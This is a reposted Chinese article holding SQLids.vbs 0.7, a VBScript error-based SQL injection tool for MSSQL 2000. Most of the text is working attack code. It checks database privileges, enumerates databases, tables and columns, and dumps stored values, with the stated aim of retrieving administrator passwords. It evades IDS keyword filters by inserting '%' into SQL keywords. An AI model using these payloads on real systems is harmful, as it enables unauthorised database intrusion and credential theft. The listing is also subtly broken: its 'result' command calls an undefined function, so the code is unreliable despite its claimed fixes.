SQLids.vbs 0.7(最终版,以后改成gui界面的)
收集整理的这篇文章主要介绍了SQLids.vbs 0.7(最终版,以后改成gui界面的),觉得挺不错的,现在分享给大家,也给大家做个参考。注意:这是一个针对 MSSQL 2000 显错注入的命令行工具,所有请求都以 POST 发出,只能在获得授权的测试环境中使用。作者附注:下面这两个问题确实存在。
第一,应当用正则判断较好。
第二,我是用循环逐条读取,并在返回结果长度大于30时退出循环。我相信没有表名和字段名的长度会超过30个字符,但字段值有可能超过,这一点处理得不够好。不过该脚本主要用来查后台管理员的用户名和密码,所以就没有再改。
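' SQLids.vbs 0.7 - error-based SQL injection helper for MSSQL 2000 (author: lcx).
'
' What the script does (everything below is visible in the payloads themselves):
'   * Every request is a POST: the part of the URL before "?" is the target and the
'     query string, followed by a space and the injection payload, is sent as the
'     form body (GetBody / page).
'   * Values are read out of the server's conversion error text: each payload forces
'     a string into an int comparison (">0" or "=0") and result() returns the quoted
'     value that follows the word "varchar" in the error message.
'   * ReplaceKeyWord() splits SQL keywords with "%" - the author's IDS-filter bypass.
'     Whether the target strips those stray "%" characters is server-dependent.
'
' Notes for defenders writing detections:
'   * Role names are hex-encoded: 0x730079007300610064006D0069006E00 is N'sysadmin',
'     0x640062005F006F0077006E0065007200 is N'db_owner'; xtype=0x7500 ('u') selects
'     user tables; table and search keywords arrive as 0x.. literals via Str2HEx*.
'   * "%2b" (+) with "ch%ar(124)" (|) or "ch%ar(94)" (^) appends a delimiter so that
'     even a purely numeric result fails the int conversion and shows up in the error.
'   * The search command uses "/* */" instead of whitespace and skips column names
'     that start with "@" (left(name,1)!=0x40).
'
' Fixes relative to the 0.7 listing:
'   * the wscript.exe guard compared LCase(...) with "Wscript.Exe" and never fired;
'   * an unknown command printed nothing (the string ">" comparisons in Case Else);
'   * the privilege check printed "PUBLIC" right after "SA";
'   * a missing operand or a non-numeric count crashed the script;
'   * the table listing started at "not in (select top 1 ...)" and skipped the first table;
'   * MoveR() deduplicated with InStr and dropped names that were substrings of earlier ones;
'   * a failed request returned Empty and crashed in BytesToBstr;
'   * a few keyword-table entries and help strings look like transcription artefacts
'     in this listing ("shutdown- >", "| [k]|", "in% ner", "From"/"Exec"/"nExt", "seArch",
'     ".htML") and are normalised so the case-sensitive Replace() actually matches.

Set arg = WScript.Arguments

' Only run under cscript.exe - under wscript.exe every echo becomes a dialog box.
If LCase(Right(WScript.FullName, 11)) = "wscript.exe" Then
    WScript.Quit
End If

If arg.Count = 0 Then
    usage()
    WScript.Quit
End If

' Print the command reference. The command keywords ("filed", not "field") are part
' of the CLI contract and are kept exactly as the Select Case below expects them.
Sub usage()
    wsh.echo String(79, "*")
    wsh.echo "暂且只支持msSQL显错模式,直接写url为数字型,写url'为字符型,url里有&请用双引号包含url"
    wsh.echo "sqlids v0.7 for mssql2000 with error by lcx"
    wsh.echo "以下两个脚本可互相参考"
    wsh.echo "//www.js-code.com/article/14172.htm"
    wsh.echo "http://hi.baidu.com/myvbscript/blog/item/5c9b29124a3fa55bf919b878.html"
    wsh.echo "Usage:"
    wsh.echo "cscript " & WScript.ScriptName & " url limit ||----------->得到当前权限" & vbCrLf & _
             "Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 limit"
    wsh.echo "cscript " & WScript.ScriptName & " url dbname ||----------->得到全部库名" & vbCrLf & _
             "Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 dbname"
    wsh.echo "cscript " & WScript.ScriptName & " url table 库名||-------->得到所给库的全部表名" & vbCrLf & _
             "Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 table master"
    wsh.echo "cscript " & WScript.ScriptName & " url filed 库名 表名 ||---------->得到所给库所给表的全部字段" & vbCrLf & _
             "Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 filed master spt_server_info"
    wsh.echo "cscript " & WScript.ScriptName & " url result 字段名 库名 表名||--->得所给库、表、字段的字段值" & vbCrLf & _
             "Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 result id master Sysinfo"
    wsh.echo "cscript " & WScript.ScriptName & " url search 你要查找的字段名||--->根据关键字查找字段" & vbCrLf & _
             "Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 search pass"
    wsh.echo String(79, "*") & vbCrLf
End Sub

' Minimum number of command-line arguments (url + command + operands) per command.
' Unknown commands fall through to 2 so that Case Else can print the usage text.
Function requiredArgs(cmd)
    Select Case cmd
        Case "limit", "dbname": requiredArgs = 2
        Case "table", "search": requiredArgs = 3
        Case "filed": requiredArgs = 4
        Case "result": requiredArgs = 5
        Case Else: requiredArgs = 2
    End Select
End Function

' Turn a count extracted from an error page ("12", "12^", " 12 ") into a Long,
' or -1 when the page did not contain a usable number (the 0.7 listing fed the
' raw string straight into "For i = 1 To k" and died with a type mismatch).
Function parseCount(raw)
    Dim s
    s = Trim(Replace(raw, Chr(94), ""))
    If Len(s) > 0 And IsNumeric(s) Then
        parseCount = CLng(s)
    Else
        parseCount = -1
    End If
End Function

' Fetch Path and decode the response bytes as GB2312 (the encoding the target
' pages are assumed to use - adjust if the error text comes back garbled).
Function getHTTPPage(Path)
    Dim t
    t = GetBody(Path)
    getHTTPPage = BytesToBstr(t, "GB2312")
End Function

' Deliberately minimal: only spaces are encoded. The payloads rely on literal "%"
' sequences ("se%lect", "%2b", "%3E") reaching the server untouched, so a full
' URL-encoder here would break them.
Function UrlEncode(str)
    str = Replace(str, " ", "%20")
    UrlEncode = str
End Function

' POST the query string of url (everything after the first "?") to the path before
' it and return the raw response bytes, or Empty when the request failed.
' The parameter deliberately shadows the global url used by page().
Function GetBody(url)
    On Error Resume Next
    Dim Aurl, Retrieval, postData
    Aurl = Split(url, "?")
    ' A URL without "?" has nothing to post; 0.7 indexed Aurl(1) and the error was
    ' silently swallowed by On Error Resume Next.
    If UBound(Aurl) >= 1 Then
        postData = UrlEncode(Aurl(1))
    Else
        postData = ""
    End If
    Set Retrieval = CreateObject("Microsoft.XMLHTTP")
    With Retrieval
        .Open "post", Aurl(0), False, "", ""
        .setRequestHeader "Content-type", "application/x-www-form-urlencoded"
        ' NOTE(review): if the target honours this header, ResponseBody may arrive
        ' compressed and result() will not find the "varchar" marker - confirm before
        ' relying on it, or drop the header.
        .setRequestHeader "Accept-Encoding", "gzip, deflate"
        .setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)"
        .setRequestHeader "Connection", "Keep-Alive"
        .setRequestHeader "Cache-Control", "no-cache"
        .Send postData
        GetBody = .ResponseBody
        .abort
    End With
    Set Retrieval = Nothing
End Function

' Convert a byte array to a string using charset Cset via ADODB.Stream.
' Returns "" when Body is not a byte array (e.g. GetBody failed and returned Empty).
Function BytesToBstr(Body, Cset)
    Dim objstream
    If Not IsArray(Body) Then
        BytesToBstr = ""
        Exit Function
    End If
    Set objstream = CreateObject("adodb.stream")
    objstream.Type = 1        ' adTypeBinary
    objstream.Mode = 3        ' adModeReadWrite
    objstream.Open
    objstream.Write Body
    objstream.Position = 0
    objstream.Type = 2        ' adTypeText
    objstream.Charset = Cset
    BytesToBstr = objstream.ReadText
    objstream.Close
    Set objstream = Nothing
End Function

' Rewrite SQL keywords with an embedded "%" (the author's filter bypass). Replace()
' is case-sensitive, so the table is lower-case to match the payloads below; the
' order matters because later entries also rewrite text produced by earlier ones.
Function ReplaceKeyWord(Value)
    Dim Table, i, Relpacement, Temp
    Table = "select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|" & _
            "drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in%ner|[k]|join->jo%in|[k]|" & _
            "from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|" & _
            "having->hav%ing|[k]|table->tab%le|[k]|shutdown->shu%tdown|[k]|kill->k%ill|[k]|" & _
            "declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|" & _
            "sqloledb->sqlo%ledb|[k]|char->c%har|[k]|fetch->fe%tch|[k]|next->ne%xt|[k]|" & _
            "allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|exec->e%xec|[k]|" & _
            "=!->=%!|[k]|--->-%-|[k]|xp_->x%p_|[k]|sp_->s%p_|[k]|and->a%nd"
    Relpacement = Split(Table, "|[k]|")
    ReplaceKeyWord = Value
    For i = 0 To UBound(Relpacement)
        Temp = Split(Relpacement(i), "->")
        If UBound(Temp) = 1 Then
            ReplaceKeyWord = Replace(ReplaceKeyWord, Temp(0), Temp(1))
        End If
    Next
End Function

' Pull the leaked value out of an MSSQL conversion error page: the text after the
' first "varchar", then the part between the first pair of single quotes.
' Returns the input unchanged when neither marker is present.
Function result(sHTMLTEMP)
    Dim parts
    parts = Split(sHTMLTEMP, "varchar")
    If UBound(parts) > 0 Then
        parts = Split(parts(1), "'")
        ' 0.7 read parts(1) unconditionally and crashed on a page without a quote.
        If UBound(parts) > 0 Then
            sHTMLTEMP = parts(1)
        End If
    End If
    result = sHTMLTEMP
End Function

' UTF-16LE hex literal for an nvarchar comparison, e.g. "ab" -> 0x61006200.
' 0.7 used Hex(Asc(c)) & "00", which yields an odd-length literal for code points
' below 0x10 and is wrong outside ASCII; AscW with zero padding covers the BMP.
Function Str2HEx(strHEx)
    Dim i, cp, h, sHEx
    sHEx = ""
    For i = 1 To Len(strHEx)
        cp = AscW(Mid(strHEx, i, 1))
        If cp < 0 Then cp = cp + 65536          ' AscW returns a signed 16-bit value
        h = Right("0000" & Hex(cp), 4)
        sHEx = sHEx & Right(h, 2) & Left(h, 2)  ' little-endian byte order
    Next
    Str2HEx = "0x" & sHEx
End Function

' Single-byte hex literal, e.g. "pass" -> 0x70617373 (used as a varchar in charindex).
' Bytes below 0x10 are zero-padded; multi-byte Asc() values are emitted as 0.7 did.
Function Str2HExtwo(strHEx)
    Dim i, h, sHEx
    sHEx = ""
    For i = 1 To Len(strHEx)
        h = Hex(Asc(Mid(strHEx, i, 1)))
        If Len(h) < 2 Then h = "0" & h
        sHEx = sHEx & h
    Next
    Str2HExtwo = "0x" & sHEx
End Function

' Remove duplicate (and empty) entries from a comma-separated list, keeping the
' first occurrence order. Exact-match dedup: 0.7 used InStr and therefore dropped
' "users|pass" when "users|password" had already been seen.
Function MoveR(Rstr)
    Dim seen, parts, i, out
    Set seen = CreateObject("Scripting.Dictionary")
    parts = Split(Rstr, ",")
    out = ""
    For i = 0 To UBound(parts)
        If Len(parts(i)) > 0 And Not seen.Exists(parts(i)) Then
            seen.Add parts(i), True
            If Len(out) > 0 Then out = out & ","
            out = out & parts(i)
        End If
    Next
    MoveR = out
End Function

' Send one payload (appended to the global url after a space, keywords split by
' ReplaceKeyWord) and return the page text with double quotes removed.
Function page(sql)
    page = Replace(getHTTPPage(url & " " & ReplaceKeyWord(sql)), Chr(34), "")
End Function

url = arg(0)
If arg.Count < 2 Then
    wscript.echo "注意参数"
    usage()
    WScript.Quit
End If
injection = arg(1)
If arg.Count < requiredArgs(injection) Then
    wscript.echo "注意参数"
    usage()
    WScript.Quit
End If

' ---------------------------------------- injection statements, no quotes needed
Select Case injection
    Case "limit"
        ' Baseline page, then two boolean probes: a true condition leaves the page
        ' unchanged, so equal lengths mean the role test succeeded.
        body = Replace(getHTTPPage(url), Chr(34), "")
        sqlone = "and (select is_srvrolemember(0x730079007300610064006D0069006E00))>0--"   ' N'sysadmin'
        sqltwo = "and (select is_member(0x640062005F006F0077006E0065007200))>0--"           ' N'db_owner'
        Bodyone = page(sqlone)
        bodytwo = page(sqltwo)
        wsh.echo "当前信息:"
        ' 0.7 used two independent Ifs and printed "PUBLIC" right after "SA".
        If Len(body) = Len(Bodyone) Then
            wsh.echo "SA"
        ElseIf Len(body) = Len(bodytwo) And Len(body) > Len(Bodyone) Then
            wsh.echo "DB_owner"
        Else
            wsh.echo "PUBLIC"
        End If
        ' Each probe forces a string into an int comparison to leak it in the error.
        sqlthree = "and @@servername>0--|and @@version>0--|and user>0--|and db_name()>0--"
        rtemp = Split(sqlthree, "|")
        servername = result(page(rtemp(0)))
        version = result(page(rtemp(1)))
        user = result(page(rtemp(2)))
        db_name = result(page(rtemp(3)))
        wsh.echo "servername:" & servername
        wsh.echo "version:" & version
        wsh.echo "user:" & user
        wsh.echo "db_name:" & db_name

    Case "dbname"
        ' Walk db_name(1), db_name(2), ... until the server stops raising the error.
        i = 1
        Do
            sql = "and db_name(" & i & ")>0--"
            Body = page(sql)
            k = InStrRev(body, "varchar", -1, 0)
            i = i + 1
            If k > 0 Then
                wscript.echo result(body)
            Else
                wsh.echo "========over============"
            End If
        Loop Until k = 0

    Case "table"
        ' arg(2) is the database. Each round asks for the first user table not among
        ' the first i already listed; 0.7 started at i=1 and never showed the first one.
        i = 0
        Do
            If i = 0 Then
                exclude = ""
            Else
                exclude = " and name not in (select top " & i & " name from " & arg(2) & ".dbo.sysobjects where xtype=0x7500)"
            End If
            sql = "and 0>(select top 1 name from " & arg(2) & ".dbo.sysobjects where xtype=0x7500" & exclude & ")--"
            Body = page(sql)
            k = InStrRev(body, "varchar", -1, 0)
            i = i + 1
            If k > 0 Then
                wscript.echo result(body)
            Else
                wsh.echo "========over============"
            End If
        Loop Until k = 0

    Case "filed"
        ' arg(2) = database, arg(3) = table. Resolve the table's object id, count its
        ' columns, then read them one at a time ordered by colid.
        sqlbiaoid = "an%d (se%l%e%c%t to%p 1 ca%st(id as nvarch%ar(20))%2bch%ar(124) fr%om [" & arg(2) & "]..[sy%sob%je%cts] wh%ere name=" & Str2HEx(arg(3)) & ")=0-- "
        biaoid = result(page(sqlbiaoid))
        biaoid = Replace(biaoid, Chr(124), "")
        sqlclounmcnt = "an%d (se%l%e%c%t ca%st(co%unt(1) as varch%ar(10))%2bch%ar(94) fr%om [" & arg(2) & "]..[sys%columns] wh%ere id=" & biaoid & ")=0-- "
        k = Replace(result(page(sqlclounmcnt)), Chr(94), "")
        wsh.echo "共有列名" & k & "个"
        n = parseCount(k)
        If n < 0 Then
            wsh.echo "could not read a column count from the error page; check the url and the table name"
        Else
            For i = 1 To n
                sqlfiled = " an%d (se%l%e%c%t to%p 1 ca%st(name as varch%ar(8000)) fr%om (se%l%e%c%t to%p " & i & " colid,name fr%om [" & arg(2) & "]..[sys%columns] wh%ere id=" & biaoid & " order by colid) t order by colid desc)=0--"
                wsh.echo result(page(sqlfiled))
            Next
        End If

    Case "result"
        ' arg(2) = column, arg(3) = database, arg(4) = table. Count the rows, then
        ' dump the column value of row i via nested "top i ... order desc".
        sqlcloum = "and (select cast(count(1) as varch%ar(8000))%2bchar(94) from [" & arg(3) & "]..[" & arg(4) & "] where 1=1)>0--"
        k = result(page(sqlcloum))
        k = Replace(k, Chr(94), "")
        wsh.echo arg(2) & "字段共有记录数" & k & "个" & vbCrLf
        n = parseCount(k)
        If n < 0 Then
            wsh.echo "could not read a row count from the error page; check the url, database and table"
        Else
            For i = 1 To n
                sqlneirong = "an%d (se%l%e%c%t to%p 1 ca%st(" & arg(2) & " as varch%ar)%2bch%ar(94) fr%om (se%l%e%c%t to%p " & i & " [" & arg(2) & "] fr%om [" & arg(3) & "]..[" & arg(4) & "] wh%ere 1=1 order by [" & arg(2) & "]) t wh%ere 1=1 order by [" & arg(2) & "] desc )=0--"
                Body = page(sqleirongOrDefault(sqlneirong))
                wscript.echo Replace(result(body), Chr(94), "")
            Next
        End If

    Case "search"
        ' Find up to 10 columns whose name contains arg(2), printed as "table|column".
        ' Column names starting with "@" (0x40) are skipped.
        love = Str2HExtwo(arg(2))
        wscript.echo "请稍候,正在查循,暂且只列10条,结果显示为'表名|字段名'格式"
        TimeSpend = Timer
        a = ""
        For i = 1 To 10   ' raise this limit if more hits are wanted
            sqlsearch = "And (select/* */top/* */1/* */t_name%2bchar(124)%2bc_name/* */from/* */(select/* */top/* */" & i & "/* */object_name(id)/* */as/* */t_name,name/* */as/* */c_name/* */from/* */syscolumns/* */where/* */charindex(cast(" & love & "/* */as/* */varchar(2000)),name)%3E0/* */and/* */left(name,1)!=0x40/* */order/* */by/* */t_name/* */asc)/* */as/* */T/* */order/* */by/* */t_name/* */desc)>0--"
            Body = page(sqlsearch)
            body = result(body)
            a = a & body & ","
        Next
        TimeSpend = Round(Timer - TimeSpend, 2)
        wsh.echo MoveR(a)
        wsh.echo "用时:" & TimeSpend & "秒."

    Case Else
        ' 0.7 guarded this with string ">" comparisons that were often all false,
        ' so a mistyped command produced no output at all.
        wscript.echo "注意参数"
        usage()
End Select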
